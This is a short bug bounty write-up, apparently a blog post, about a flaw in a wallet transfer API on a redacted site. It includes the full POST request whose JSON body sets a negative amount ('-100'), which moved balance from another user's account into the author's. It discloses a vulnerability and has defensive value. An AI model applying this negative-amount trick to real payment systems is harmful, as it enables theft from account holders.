Stealing money from one account to another account

While my recon on one of the bug bounty website, i found a subdomain which consists of sensitive information as well as others too but here i am going to share the most interesting bug i found when further testing.

While i was digging and digging i found a end point to send the money from one account to another account. I was not going to test :P, trying to send money from one account to another account. I thought it will be impossible but still let’s give a damn try and tried idor and other methods and failed :) .

So what ?

Let’s think out of the box

Now i tried to send money to another account by adding (-) sign in the amount and the request was like below

Request

POST https://api.redacted.com/api/transaction/transfer

Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Content-Length: 96
content-type: application/json
Host: api.redacted.com
Origin: https://redacted.com
Referer: https://redacted.com/site/wallet
Request Body

{
 “addressTo”: “evilboyajay”,
 “amount”: “-100”,
 “userFromId”: 1925
}

And guess what happen?

It loaded balance to my account(i.e id1925) but in account (evilboyajay) balance got deducted with the amount i supplied. Little, tricky but it was awesome finding this bug.

In this way, i was able to steal balance from other’s account to mine.